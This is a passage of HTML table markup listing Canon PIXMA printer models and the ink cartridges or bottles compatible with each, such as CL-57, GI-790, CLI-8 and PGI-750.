width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td 